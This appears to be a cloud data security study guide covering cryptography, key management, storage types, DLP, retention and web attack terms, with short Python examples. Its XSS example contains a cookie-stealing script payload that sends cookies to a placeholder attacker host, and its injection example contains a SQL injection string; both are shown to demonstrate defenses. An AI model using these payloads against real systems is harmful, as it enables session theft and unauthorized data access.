The term “cloud data security” describes the safeguards put in place to prevent data breaches, exfiltration, and unauthorized access to data stored in the cloud.
The data lifecycle occurs in six stages.
- Data Creation : Data classification is a fundamental security control since it helps the company determine data value and apply relevant controls.
- Data Storage : Data storage policies and procedures should regulate things like who has access to what, how access is granted, and how sensitive data is encrypted by default.
- Data Usage : Data loss prevention (DLP), information rights management (IRM), technical system access restrictions, authorization and access review processes, network monitoring tools, and so on all contribute to an appropriate level of security.
- Data Share : Access-granting and role-based authorizations are proactive access restrictions. DLP, IRM, and access reviews can detect and prevent unwanted data sharing.
- Data Archive : Data that has passed its useful life often still needs to be retained for a variety of reasons, such as ongoing legal action or a compliance requirement.
- Data Destroy : Data that is no longer usable and is no longer required to be retained should be securely destroyed.
Data Dispersion
The term “data dispersion” refers to a technique used in cloud computing environments in which data is divided into smaller chunks and stored across a variety of different physical storage devices.
RAID (Redundant Array of Independent Disks) is a data storage technology that involves the dispersion of data across multiple hard drives for redundancy and performance. For instance, in a RAID 5 configuration, data is striped across several disks with parity information, providing fault tolerance. If one drive fails, the data can be reconstructed from the parity information on the remaining drives, minimizing the risk of data loss.
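To make the parity idea concrete, the following minimal Python sketch shows how an XOR parity block lets a lost data block be reconstructed. The block contents and stripe size are hypothetical choices for illustration, not an actual RAID implementation.

```python
# Minimal sketch of RAID 5-style parity (illustration only, not a storage driver).
def xor_blocks(blocks):
    """XOR a list of equal-length byte blocks together."""
    result = bytearray(len(blocks[0]))
    for block in blocks:
        for i, b in enumerate(block):
            result[i] ^= b
    return bytes(result)

# Three data blocks striped across three disks, parity stored on a fourth.
d1, d2, d3 = b"AAAA", b"BBBB", b"CCCC"
parity = xor_blocks([d1, d2, d3])

# If the disk holding d2 fails, its contents can be rebuilt from the
# remaining blocks plus the parity block.
rebuilt_d2 = xor_blocks([d1, d3, parity])
assert rebuilt_d2 == d2
```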
Most cloud providers have built geographic restriction capabilities into their services in order to give customers the advantages of dispersion without burdening them with excessive legal and regulatory complications.
Data Flows
In cybersecurity, data flows refer to the paths that data takes within a system or network. Understanding and monitoring these data flows is crucial for securing information. For example, in a network, data might flow from a user’s device to a server and back. Implementing measures such as encryption, firewalls, and intrusion detection systems helps safeguard these data flows and protect against unauthorized access or malicious activities.
Cryptography
Cryptography encompasses various methods like encryption, which converts readable data into unintelligible form, and decryption, which reverses the process. It’s a vital component in ensuring secure communication and safeguarding sensitive information in fields like computer security and information technology.
- Symmetric-key cryptography: Involves using the same key for both encryption and decryption. Examples include the Advanced Encryption Standard (AES) and Data Encryption Standard (DES).
- Asymmetric-key cryptography (Public-key cryptography): Uses a pair of public and private keys. The public key is used for encryption, and the private key is used for decryption. Examples include RSA (Rivest–Shamir–Adleman) and Elliptic Curve Cryptography (ECC).
- Hash functions: One-way mathematical functions that generate a fixed-size output (hash) from input data. Examples include SHA-256 (Secure Hash Algorithm 256-bit) and MD5 (Message Digest Algorithm 5).
- Digital signatures: Provide a way to verify the authenticity and integrity of a message or document. Examples include DSA (Digital Signature Algorithm) and ECDSA (Elliptic Curve Digital Signature Algorithm).
These cryptographic methods are used in various combinations to achieve different security objectives.
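As a rough illustration of two of these building blocks, the sketch below performs symmetric encryption and hashing in Python. It assumes the third-party cryptography package is installed; the plaintext is a placeholder.

```python
# Sketch of symmetric encryption and hashing, assuming the third-party
# "cryptography" package is installed (pip install cryptography).
import hashlib
from cryptography.fernet import Fernet

# Symmetric-key encryption: the same key encrypts and decrypts.
key = Fernet.generate_key()          # random key material, base64-encoded
cipher = Fernet(key)                 # Fernet uses AES under the hood
token = cipher.encrypt(b"sensitive record")
assert cipher.decrypt(token) == b"sensitive record"

# Hash function: one-way, fixed-size digest of arbitrary input.
digest = hashlib.sha256(b"sensitive record").hexdigest()
print(digest)  # 64 hex characters (256 bits); changes if the input changes
```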
A cipher suite refers to a set of cryptographic algorithms that are used to secure network communication. It includes protocols for key exchange, encryption, and message authentication. The combination of these algorithms is crucial for establishing a secure communication channel. Common components of a cipher suite include:
- Key Exchange Algorithm: Determines how cryptographic keys are exchanged between parties. Examples include Diffie-Hellman (DH) and Elliptic Curve Diffie-Hellman (ECDH).
- Cipher (Encryption) Algorithm: Specifies how the actual data is encrypted. Examples include AES (Advanced Encryption Standard) and 3DES (Triple Data Encryption Standard).
- Message Authentication Code (MAC) Algorithm: Ensures the integrity of the transmitted data. Examples include HMAC (Hash-Based Message Authentication Code).
- Hash Function: Used for various purposes, such as generating digital signatures or deriving keys. Examples include SHA-256 and SHA-3.
Cipher suite management involves selecting appropriate cipher suites for a particular application or system, considering factors like security, performance, and compatibility. It also includes periodic updates to ensure that cryptographic protocols remain resilient against evolving threats. Administrators often configure systems to prioritize more secure cipher suites while avoiding those with known vulnerabilities. This ongoing management is crucial for maintaining the security of encrypted communications.
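As an illustration of cipher suite configuration, the sketch below uses Python's standard ssl module; the OpenSSL cipher string is only an example preference, not a vetted security policy.

```python
# Sketch of cipher suite selection with Python's standard ssl module.
import ssl

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.minimum_version = ssl.TLSVersion.TLSv1_2        # refuse older protocol versions
ctx.set_ciphers("ECDHE+AESGCM:!aNULL:!MD5:!3DES")   # prefer ECDHE key exchange with AES-GCM,
                                                    # exclude anonymous, MD5, and 3DES suites

# Inspect which suites the context will actually offer.
for suite in ctx.get_ciphers()[:5]:
    print(suite["name"], suite["protocol"])
```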
Key Management
Cryptography key management involves the generation, distribution, storage, and disposal of cryptographic keys to ensure secure communication. Here are key aspects:
- Key Generation: Creating strong, random keys using reliable algorithms. For example, in symmetric encryption, keys need to be unique and unpredictable.
- Key Distribution: Securely delivering keys to authorized parties. In symmetric cryptography, this is especially challenging as both parties need the same key without interception.
- Key Storage: Safeguarding keys against unauthorized access. Hardware security modules (HSMs) or secure key storage practices are common.
- Key Update: Regularly changing keys to enhance security. Frequent key updates are crucial in maintaining a robust cryptographic system.
- Key Usage: Clearly defining how keys are utilized, including encryption, decryption, digital signatures, etc.
- Key Revocation: Disabling compromised or unauthorized keys to prevent their misuse. Timely key revocation is essential for maintaining security.
- Key Destruction: Ensuring secure disposal of keys that are no longer needed. This prevents the potential misuse of obsolete keys.
- Key Backup and Recovery: Implementing procedures for key backup to prevent data loss and establishing recovery mechanisms if keys are lost.
- Key Escrow: In certain scenarios, especially in public-key cryptography, arrangements might be made for a trusted third party to hold a copy of cryptographic keys.
Effective key management is fundamental to the security of cryptographic systems. Automated tools and secure protocols play a crucial role in simplifying key management processes while minimizing the risk of key compromise. Regular audits and assessments are also vital to ensuring the ongoing effectiveness of key management practices.
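The following sketch illustrates one way key rotation can look in code, assuming the third-party cryptography package; the tokens and keys are placeholders.

```python
# Sketch of key rotation, assuming the third-party "cryptography" package.
from cryptography.fernet import Fernet, MultiFernet

old_key = Fernet.generate_key()
token = Fernet(old_key).encrypt(b"customer record")   # data encrypted under the old key

# Rotation: introduce a new key, keep the old one only for decryption.
new_key = Fernet.generate_key()
rotator = MultiFernet([Fernet(new_key), Fernet(old_key)])  # first key is used for new encryptions

rotated_token = rotator.rotate(token)   # re-encrypts the payload under new_key
assert Fernet(new_key).decrypt(rotated_token) == b"customer record"
# Once all tokens are rotated, old_key can be securely destroyed.
```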
Cloud Service Provider (CSP) Responsibilities:
- Key Generation and Storage: The CSP is often responsible for generating and securely storing cryptographic keys used for various purposes, such as encrypting customer data at rest.
- Key Rotation: Implementing key rotation policies to regularly update cryptographic keys to enhance security.
- Access Controls: Managing access controls to restrict access to keys, ensuring that only authorized personnel within the CSP have the necessary permissions.
- Compliance: Ensuring that key management practices comply with industry standards and regulatory requirements.
Customer-Managed Responsibilities:
- Key Usage: Customers are responsible for using cryptographic keys appropriately within their applications and systems.
- Key Distribution: Distributing keys securely to their intended recipients, especially in scenarios like secure communication between different components of a cloud-based application.
- Key Revocation: Taking action to revoke and replace keys if they are compromised or if personnel changes within the customer organization.
- Integration: Integrating cryptographic functions into their applications, ensuring that keys are properly handled within the customer’s environment.
Collaboration:
- Key Exchange: Collaboratively establishing secure key exchange protocols for scenarios where secure communication involves both the CSP and the customer.
- Incident Response: Collaborating in incident response efforts, especially in situations where a compromise affects both the CSP and the customer.
In a customer-managed approach, the customer has more direct control over cryptographic keys, allowing for greater customization and alignment with specific security requirements. However, both parties need to collaborate to ensure a secure and cohesive overall system. The specific responsibilities can vary based on the service models (IaaS, PaaS, SaaS) and the agreed-upon terms between the CSP and the customer.
A Pseudorandom Number Generator (PRNG) is a fundamental component in cybersecurity used for generating sequences of numbers that appear random. However, unlike true random numbers, PRNGs are deterministic and rely on an initial value called a seed. Here are key aspects of PRNGs in cybersecurity:
- Cryptographic PRNGs (CPRNGs): Specifically designed for use in cryptographic applications, CPRNGs must satisfy additional criteria for unpredictability and resistance to certain attacks. They are crucial for generating cryptographic keys and nonces.
- Entropy Source: PRNGs require a source of entropy (unpredictable input) for their initial seed. In cybersecurity, obtaining sufficient entropy is critical to ensure the randomness and security of generated numbers.
- Seed Management: Protecting the initial seed value is crucial, as knowledge of the seed can compromise the entire sequence of pseudorandom numbers. Cryptographic systems often employ secure methods for seed generation and storage.
- Periodicity: PRNGs have a finite cycle after which they repeat their sequence. Cryptographically secure PRNGs aim to have exceedingly long periods, making it computationally infeasible to predict future values even with knowledge of past values.
- Use Cases: PRNGs are extensively used in cybersecurity for tasks such as generating cryptographic keys, initialization vectors (IVs), nonces, and random challenges in authentication protocols.
- Testing and Validation: Cryptographic PRNGs undergo rigorous testing to ensure they meet specified security requirements. Common tests include checking for uniformity, independence, and resistance to statistical attacks.
- Secure Applications: Cryptographic protocols, secure communication, digital signatures, and other cybersecurity mechanisms heavily rely on the unpredictability and security of pseudorandom numbers.
- Hardware RNGs: For higher levels of security, some systems use Hardware Random Number Generators (HRNGs), which exploit physical processes (like electronic noise) to generate true random numbers.
- Entropy Accumulation: Systems continuously gather entropy from various sources to reseed PRNGs and maintain a high level of unpredictability, especially in long-running applications.
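The sketch below contrasts a general-purpose PRNG with the cryptographically secure interfaces Python exposes; the specific output sizes are arbitrary examples.

```python
# Sketch contrasting a general-purpose PRNG with CSPRNG interfaces in Python.
import random   # Mersenne Twister: deterministic, predictable from its seed/state
import secrets  # wraps the OS CSPRNG (e.g., /dev/urandom on Linux)
import os

random.seed(42)
print(random.getrandbits(128))      # reproducible -- never use for keys or tokens

print(secrets.token_hex(16))        # 128-bit token suitable for session IDs or nonces
print(secrets.token_bytes(32))      # raw key material, 256 bits
print(os.urandom(12))               # e.g., a 96-bit nonce for an authenticated cipher
```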
Cloud Data Storage
Resource sharing is one of the defining characteristics of cloud services. While virtualized storage pools offer greater flexibility than standalone hard drives or storage area networks, it can be challenging to determine where, and how much, data is being kept within such large pools.
IaaS (Infrastructure as a Service)
- Ephemeral : Ephemeral storage does not store data for long. Like RAM and other volatile memory architectures, it lasts only as long as an IaaS instance is running and is lost when the virtual machine is powered down. Because modern operating systems require temporary storage for system files and memory swap files, ephemeral storage is generally bundled with compute capabilities rather than sold as storage.
- Raw : Raw device mapping (RDM) allows a VM to access its LUN, which is a piece of the storage capacity designated to it.
- Long-term : Long-term storage is durable, permanent storage media used for records preservation and data archiving. Search, data discovery, and immutable storage for data integrity may be offered via the storage.
- Volume : Volume storage presents virtualized drives to cloud instances and distributes data in specified blocks. Virtualized disks can break data into blocks and store them across numerous physical drives, using erasure coding to rebuild any lost blocks.
- Object : Object storage stores and retrieves data as discrete objects, most commonly files, and file browsers allow users to navigate and work with this data.
PaaS (Platform as a Service)
- Disk : A PaaS instance can be connected to a virtual disk, which may be backed by volume or object storage.
- Databases : Popular database software can be given as a service, where data is accessed via API calls to the database in a multitenant approach.
- Binary Large Object (blob) : Blobs hold unstructured data that does not follow a data model such as a database’s columns.
SaaS (Software as a Service)
In SaaS, the data storage format is designed to support the web-based application that stores and retrieves the data. Examples include content and file shares and content delivery networks.
Threats to Storage Types
Examples : Unauthorized access, unauthorized provisioning, regulatory noncompliance, jurisdictional issues, denial of service, data corruption or destruction, theft or media loss, malware and ransomware, and improper disposal.
Data Security Technologies
Encryption and Key Management
Data is encrypted by applying mathematical transformations. The cryptographic system transforms data using a key, or cryptovariable. If the encrypted data, the cryptovariable, and the algorithm are known, the encryption procedure can be reversed.
Encryption can be applied at several levels: storage-level, volume-level, object-level, file-level, application-level, and database-level.
Hashing (one-way encryption)
Hash functions use mathematical procedures to create a unique hash value from input of any length. The operation can be repeated later and the two hash values compared to determine whether the input data has changed; mismatched hash values indicate data alteration.
Some antimalware and intrusion detection systems monitor important system files for changes, and highly secure systems may hash hardware data including manufacturer, devices connected, and model numbers.
Hashes are an essential component of digital signatures, which allow users to verify the integrity as well as the source of a message, file, or other data.
Collision resistance: A collision occurs when two different inputs produce the same hash value. A hash function that permits collisions cannot ensure integrity.
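A minimal integrity-check sketch using Python's hashlib is shown below; the file path is a hypothetical example.

```python
# Sketch of a file-integrity check with hashlib; the path is hypothetical.
import hashlib

def sha256_of_file(path, chunk_size=65536):
    """Stream the file so large files don't need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

baseline = sha256_of_file("/etc/hosts")      # recorded when the file is known-good
current  = sha256_of_file("/etc/hosts")      # recomputed later by a monitoring job
if current != baseline:
    print("File has been altered since the baseline was taken")
```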
Data Obfuscation
Data from a production environment can be duplicated for testing reasons, but any sensitive information should be masked or replaced using obfuscation. While testers may not have access to the live data, they can still do their work using the similarly-functioning fake data.
Masking
Masking is a technique that is very similar to obfuscation. It is utilized to protect sensitive data from being disclosed to unauthorized parties without actually eliminating the data.
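As a small illustration (not a production masking tool), the sketch below masks all but the last four digits of a card number; the format assumptions are hypothetical.

```python
# Minimal masking sketch: reveal only the last four digits of a card number.
def mask_pan(pan: str, visible: int = 4, mask_char: str = "*") -> str:
    digits = pan.replace(" ", "").replace("-", "")
    return mask_char * (len(digits) - visible) + digits[-visible:]

print(mask_pan("4111 1111 1111 1111"))   # ************1111
```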
Anonymization
The technique of securing private or sensitive information by removing or encrypting identifiers that link an individual to stored data is known as data anonymization.
Tokenization
Tokenization is the process of replacing private information with a generic substitute called a token.
Tokens can be linked back to the original data by submitting the appropriate request to the tokenization service, which typically enforces access controls to confirm the user’s identity and authorization to view the sensitive data.
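The toy sketch below illustrates the tokenization idea; a real tokenization service would use a hardened, access-controlled token vault rather than an in-memory dictionary, and the function names here are purely illustrative.

```python
# Toy tokenization sketch: an in-memory "vault" standing in for a real,
# access-controlled tokenization service.
import secrets

_vault = {}   # token -> original value (a real vault would be encrypted and audited)

def tokenize(value: str) -> str:
    token = "tok_" + secrets.token_urlsafe(16)   # random token, no relation to the value
    _vault[token] = value
    return token

def detokenize(token: str, caller_is_authorized: bool) -> str:
    if not caller_is_authorized:                 # access control check before release
        raise PermissionError("caller not authorized to view sensitive data")
    return _vault[token]

t = tokenize("4111111111111111")
print(t)                          # safe to store or log
print(detokenize(t, True))        # original value, returned only to authorized callers
```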
Forensics
Identifying, collecting, preserving, analyzing, and summarizing/reporting digital information and evidence is the domain of forensics, which is the use of scientific and methodical techniques to achieve these ends.
Data Loss Prevention
Data loss prevention (DLP) is a technological system that identifies, inventories, and controls sensitive data in an organization. Its controls include detective, preventive, and corrective measures.
- Discovery: Data assets must be identified, categorized, and inventoried by the organization.
- Monitoring: Assists the security team in monitoring data use and identifying any suspicious activity.
- Enforcement: Rules are applied, based on monitoring findings, to enforce security policies.
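The sketch below illustrates the monitoring and enforcement ideas with two deliberately simplified regular-expression rules; real DLP products use far richer fingerprinting and context analysis.

```python
# Sketch of DLP-style pattern detection; the regexes are simplified examples.
import re

PATTERNS = {
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "us_ssn":      re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

def scan(text: str):
    return [name for name, pattern in PATTERNS.items() if pattern.search(text)]

outgoing = "Please charge card 4111 1111 1111 1111 for the invoice."
hits = scan(outgoing)
if hits:
    print("Blocking message; matched sensitive-data rules:", hits)   # enforcement step
```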
Supporting technologies provide security measures for information systems. Encryption techniques support keys, access control systems use shared secrets to authenticate users or connection requests, and digital certificates are used for mutual authentication and access control.
- Keys: Encryption keys can uniquely identify users and systems. Since encryption techniques are publicly known and encrypted data is regularly transmitted over untrusted networks, key security is vital. Keys should be encrypted and protected with a strong passphrase or MFA.
- Secrets: Secrets are used to confirm that a message has not been intercepted. Access to storage must be closely restricted.
- Certificates: A trusted public key can be used to encrypt asymmetrically with a certificate. This is used to securely send session keys and secrets to remote hosts across untrusted connections.
Public key infrastructure (PKI) must be well designed to provide certificates to trusted parties. Certificates used as access tokens may require additional access controls, such as keys and secrets, to prevent malevolent users from accessing or transferring them.
Implement Data Discovery
Data discovery helps compile a list of the essential data assets that your firm needs to secure.
Data discovery is used by many security technologies, particularly those monitoring large-scale installations of user workstations, servers, and cloud services. System vulnerabilities, misconfigurations, intrusion attempts, and unusual network activities can be identified using analysis tools to drive security operations.
- Normalization: Normalization converts data from multiple formats into a common format. Data is retrieved from databases or applications, transformed to match the warehouse’s data model, and then loaded into warehouse storage. This process is called extract, transform, load (ETL); a sketch follows this list. Normalizing data enhances searchability.
- Data Mart: A data mart contains data that has been warehoused, analyzed, and made available for specific use like sales forecasting. Data marts typically support a specific business function by proactively gathering data needed and performing analysis and then presenting the data needed for reporting and decision-making.
- Data Mining: The process of “mining” data is looking for, identifying, and extracting meaningful patterns from large amounts of data.
- Online analytic processing (OLAP): In order to facilitate analytical processing for a data source, OLAP makes it available to users. The three main features of online analytical processing, or OLAP, are consolidation, drill-down, and slice-and-dice.
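The sketch referenced in the Normalization item above illustrates the transform step of ETL by normalizing dates from mixed source formats into a single warehouse format; the formats themselves are hypothetical.

```python
# Sketch of the "transform" step of ETL: normalizing dates from mixed source
# formats into one warehouse format. The source formats are hypothetical.
from datetime import datetime

SOURCE_FORMATS = ["%m/%d/%Y", "%Y-%m-%d", "%d %b %Y"]

def normalize_date(raw: str) -> str:
    for fmt in SOURCE_FORMATS:
        try:
            return datetime.strptime(raw, fmt).strftime("%Y-%m-%d")  # warehouse format
        except ValueError:
            continue
    raise ValueError(f"unrecognized date format: {raw!r}")

extracted = ["03/15/2024", "2024-03-16", "17 Mar 2024"]        # extract
transformed = [normalize_date(d) for d in extracted]           # transform
print(transformed)   # ['2024-03-15', '2024-03-16', '2024-03-17'] -- ready to load
```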
Data Classification
Classification of data is the process of organizing data into categories based on shared characteristics. The practice of assigning a particular system or large data collection to a certain category, in order to gather the requirements for maintaining the system’s privacy, security, and uptime, is sometimes referred to as “categorization.”
Common classification criteria include data type, legal constraints, ownership, and value/criticality.
Sensitive data types include personally identifiable information (PII), protected health information (PHI), and cardholder data subject to PCI DSS within the cardholder data environment (CDE).
Mapping
Metadata such as asset ownership (a person, role, or organizational unit) can be identified through mapping, giving the business valuable insight into who is responsible for what in terms of security.
Labeling
The classification level of a data set or system must be conveyed to users, administrators, and other stakeholders in order to secure it; labels simplify that communication.
Data Retention Policies, Practices, Archiving, Deletion & Hold
Data and records are often used interchangeably in regulatory documents. Data retention rules should balance availability, compliance, and operational goals including cost.
- HIPAA (USA): Six-year retention period.
- EU GDPR: Permits indefinite retention as long as the data subject consents and the organization has a legitimate purpose for the data. If consent is withdrawn or the organization no longer needs the data, it must delete, destroy, or anonymize it.
- Practices: Schedules, Integrity checking, Retrieval procedures, Data formats
- Archiving: Integrating a blockchain ledger with a company’s storage solution would provide unchangeable proof that the data stored there has not been tampered with.
- Deletion: Options include clear, purge (including cryptographic erasure, or crypto-shredding), and destroy; a crypto-shredding sketch follows this list.
- Legal Hold: Data retention is affected by legal hold. Data on legal hold is kept indefinitely.
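The sketch referenced in the Deletion item above illustrates cryptographic erasure: data is encrypted, and destroying the only copy of the key renders the ciphertext unrecoverable. It assumes the third-party cryptography package.

```python
# Sketch of cryptographic erasure (crypto-shredding), assuming the third-party
# "cryptography" package. Destroying the key makes the ciphertext unrecoverable.
from cryptography.fernet import Fernet, InvalidToken

key = Fernet.generate_key()
ciphertext = Fernet(key).encrypt(b"record scheduled for disposal")

# "Destroy" the data by destroying the only copy of the key.
key = None   # in practice: securely wipe the key from the KMS/HSM and any backups

try:
    Fernet(Fernet.generate_key()).decrypt(ciphertext)   # any other key fails
except InvalidToken:
    print("Ciphertext is effectively destroyed: no valid key remains")
```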
eDiscovery Processes
ISO/IEC 27050 seeks to standardize eDiscovery techniques and best practices globally. It covers all eDiscovery steps: identification, preservation, collection, processing, review, analysis, and production.
Multitenancy
In cloud computing, multitenancy refers to the sharing of a cloud provider’s computer resources between several users. Users in the cloud do not know about or interact with one another, and their data is kept completely isolated from one another even if they share resources. For cloud services to be truly useful, multitenancy must be present.
Simple Object Access Protocol ( SOAP )
SOAP stands for Simple Object Access Protocol, a messaging protocol that allows web services to exchange structured data over a network. SOAP is favored for its many desirable qualities: XML (eXtensible Markup Language) is used as the message format, while application-layer protocols such as HTTP and SMTP are used for negotiation and transmission.
While the REST API supports caching, SOAP does not.
Security Terms
Cross-site scripting (XSS)
Cross-site scripting (XSS) occurs when a malicious actor sends untrusted data to a user’s browser without validation, sanitization, or browser escaping. The code is then executed in the user’s browser with the user’s access and permissions, allowing an attacker to reroute web traffic, steal session data, or even access anything on the user’s machine that their browser can reach.
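One common defense is escaping untrusted data before it is rendered; the sketch below uses Python's html.escape with a hypothetical payload.

```python
# Sketch of output escaping, one common XSS defense; the input value is hypothetical.
import html

user_supplied = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Unsafe: the payload would execute in the victim's browser if rendered as-is.
unsafe_page = f"<p>Hello {user_supplied}</p>"

# Safer: escape before placing untrusted data into HTML output.
safe_page = f"<p>Hello {html.escape(user_supplied)}</p>"
print(safe_page)   # <p>Hello &lt;script&gt;...&lt;/script&gt;</p>
```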
Injection
An attacker injects data into an application to modify the meaning of commands issued to an interpreter.
In an injection attack, a malicious attacker transmits instructions or other arbitrary data through input and data fields to have the application or system run the code as part of its usual processing and queries.
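The sketch below contrasts an injection-prone SQL query with a parameterized one, using Python's built-in sqlite3 module; the table and input values are hypothetical.

```python
# Sketch of an injection-prone query versus a parameterized one, using sqlite3.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'user')")

attacker_input = "nobody' OR '1'='1"

# Vulnerable: attacker input changes the meaning of the SQL statement.
rows = conn.execute(
    f"SELECT * FROM users WHERE name = '{attacker_input}'").fetchall()
print(len(rows))   # 2 -- the injected OR clause returned every row

# Safe: the driver treats the input strictly as data, not SQL.
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (attacker_input,)).fetchall()
print(len(rows))   # 0 -- no user is literally named "nobody' OR '1'='1"
```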
Uptime Institute
When it comes to data center tiers and topologies, the standard published by the Uptime Institute is by far the most extensively used and well-known. It’s built on a tiered architecture with four levels; higher numbers indicate more strict and dependable security, connection, fault tolerance, redundancy, and cooling measures.
International Data Center Authority (IDCA)
The International Data Center Authority (IDCA) guidelines established the Infinity Paradigm, a comprehensive data center architecture and operating framework. Many data center models use a tiered design to increase redundancy; the Infinity Paradigm, however, does not. It stresses approaching the data center at a macro level, rather than concentrating on specific, isolated aspects in order to reach a tier status.
Inter-cloud provider
The inter-cloud service provider is accountable for administering federations and federated services, as well as peering with other cloud service providers.
Cloud services brokerage (CSB)
A CSB is a firm or other organization that aggregates, integrates, and customizes one or more (public or private) cloud services on behalf of one or more consumers of those services.
REST API
A REST API uses and relies on the HTTP protocol. The Representational State Transfer (REST) API often employs caching to improve scalability and efficiency, and the most popular data formats are JavaScript Object Notation (JSON) and Extensible Markup Language (XML).
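As a minimal illustration, the sketch below issues a REST GET request and parses a JSON response using only the Python standard library; the endpoint URL and response fields are hypothetical.

```python
# Sketch of a REST call over HTTP with a JSON response, using only the standard
# library. The endpoint URL and response fields are hypothetical.
import json
import urllib.request

req = urllib.request.Request(
    "https://api.example.com/v1/buckets/42",
    headers={"Accept": "application/json"},
    method="GET",
)
with urllib.request.urlopen(req) as resp:
    body = json.loads(resp.read().decode("utf-8"))
    print(resp.status, body.get("name"))
```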
Safe Harbor
European privacy policies restrict the export or exchange of PII from Europe to the US due to the US’s absence of a federal privacy statute. Organizations can opt into the Safe Harbor program, but they must follow EU-like rules and regulations.
Gramm Leach Bliley Act (GLBA)
The Gramm Leach Bliley Act (GLBA), also known as the Financial Services Modernization Act, applies to U.S. financial institutions and secures non-public personal information including financial records.
Cross-site request forgery (CSRF) Attack
This attack forces a user’s client to make forged requests under the user’s credentials to execute instructions and requests the application thinks are coming from a trusted client and user. Since the attacker cannot see the results of the commands, this form of attack opens up new ways to compromise an application.
Missing Function Level Access Control
When there aren’t enough authorization checks for critical request handlers, a security hole exists at the function level. With this widespread flaw, attackers can gain access to protected data by elevating their privileges to a higher function. Typically, the attacker is a legitimate user of the system who has gained access to the system and then abuses a privileged function parameter to issue malicious requests.
Cloud service manager
The cloud service manager is responsible for cloud service delivery, cloud service provisioning, and cloud service administration in general.
Business Continuity
After a disaster, business continuity planning ensures the company can continue operations. This planning is documented in a business continuity plan (BCP), also called a continuity of operations plan (COOP).
Recovery Time Objective
The recovery time objective (RTO) is determined by how long an organization is willing to function without a system.
A business impact analysis (BIA) classifies all systems by business criticality. Once prioritized, each system should be assigned a maximum acceptable downtime, called the maximum tolerable downtime (MTD). System disruptions will be significant if the RTO is greater than the MTD.
Recovery Time Objective is a decision that should be made by the business rather than the IT department.
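As a simple illustration of the RTO/MTD relationship, the sketch below flags systems whose RTO exceeds their MTD; the systems and hour values are hypothetical.

```python
# Sketch comparing business-defined RTOs against MTDs from the BIA;
# the systems and hour values are hypothetical.
systems = {
    #  name            (RTO hours, MTD hours)
    "order-processing": (2, 4),
    "reporting":        (24, 8),   # RTO exceeds MTD -- recovery plan is inadequate
}

for name, (rto, mtd) in systems.items():
    status = "OK" if rto <= mtd else "AT RISK: RTO exceeds MTD"
    print(f"{name}: RTO={rto}h, MTD={mtd}h -> {status}")
```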
Recovery Point Objective
When calculating how much data can be lost in the event of a disaster or other system disruption, businesses use a measure called the Recovery Point Objective (RPO).
In most cases, a backup strategy will be designed and run in accordance with the Recovery Point Objective.
Example: Grandfather-father-son (GFS) backup involves daily, weekly, and monthly backup cycles.
Cloud storage solutions are designed for strong data durability, making a low RPO cost-effective. Data is replicated and saved in several locations for recovery in the event of a system breakdown.
Recovery Service Level
The recovery service level defines the computing resources needed to keep production environments functioning during a disaster. Following a disaster, non-production environments can be stopped to conserve resources.
Objectives during a disaster include maintaining essential production systems and business operations until the situation stabilizes enough to allow for a return to business as usual.